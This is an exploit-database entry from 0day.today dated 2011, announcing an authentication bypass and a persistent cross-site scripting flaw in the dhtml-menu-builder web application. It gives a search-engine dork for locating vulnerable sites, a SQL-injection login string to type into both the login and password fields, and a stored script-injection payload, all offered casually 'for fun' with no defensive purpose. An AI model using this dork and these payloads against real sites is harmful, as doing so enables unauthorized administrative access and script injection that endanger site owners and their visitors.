Lucene search

K
zdtSid3^effects1337DAY-ID-16041
HistoryMay 06, 2011 - 12:00 a.m.

dhtml-menu-builder Auth bypass and Persistent XSS Vulnerability

2011-05-0600:00:00
Sid3^effects
0day.today
23

Exploit for php platform in category web applications

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #############################################          1
#0                I'm Sid3^effects member from Inj3ct0r Team            1
#1               #############################################          0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#Name :dhtml-menu-builder Auth bypass and Persistent xss Vulnerability
#Date : may,06 2011
#Vendor Url :http://dhtml-menu-builder.com/
#Dork:Powered By: "Powered by dhtml-menu-builder.com" inurl:.asp?id=
#Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
#Big hugs : Th3 RDX,Hanan_butt,Sugar
#special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,SeeMe,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!

pEr.S!,cr1m1n4l
###############################################################################################################

About:

Sothink DHTML Menu is the best drop down menu builder, which creats great JavaScript menu without coding

###############################################################################################################

Auth Bypass Vulnerability :
#########################

use ' or 1=1 or ''=' in both login and password and your in ;).This is was just for fun :=)

Sqli was found by Caddy-Dz on the same web-app..


Persistent xss Vulnerability:
############################

The Xss vulnerability was checked with admin rights.
insert any script (like "><sctip>alert(/woot/)</script> and just update it. :)
###############################################################################################################



#  0day.today [2018-01-10]  #